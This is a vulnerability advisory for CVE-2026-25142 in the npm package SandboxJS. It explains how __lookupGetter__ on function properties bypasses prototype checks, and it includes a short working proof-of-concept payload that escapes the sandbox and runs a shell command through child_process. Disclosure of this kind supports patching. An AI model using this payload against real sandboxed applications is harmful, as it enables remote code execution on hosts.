CRITICAL 10.0 npm
SandboxJS Vulnerable to Prototype Pollution -> Sandbox Escape -> RCE
GHSA-9p4w-fq8m-2hp7 · CVE-2026-25142
Published · Modified
Description
Summary
SandboxJS does not properly restrict __lookupGetter__ which can be used to obtain prototypes, which can be used for escaping the sandbox / remote code execution.
Details
The Object prototype which contains __lookupGetter__ is properly protected, but the special case for accessing function properties bypasses the prototype chain checks including the root Object prototype.
PoC
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
payload = `
let getProto = Object.toString.__lookupGetter__("__proto__")
let m = getProto.call(new Map());
m.has = isFinite;
console.log(
isFinite.constructor(
"return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
)(),
);`
sb.compile(payload)().run();
Impact
Prototype Pollution -> RCE
References
- WEB https://github.com/nyariv/SandboxJS/security/advisories/GHSA-9p4w-fq8m-2hp7
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2026-25142
- WEB https://github.com/nyariv/SandboxJS/commit/75c8009db32e6829b0ad92ca13bf458178442bd3
- PACKAGE https://github.com/nyariv/SandboxJS
- WEB https://github.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398
Ready to move
Start Securing
Free, no credit card | First findings in minutes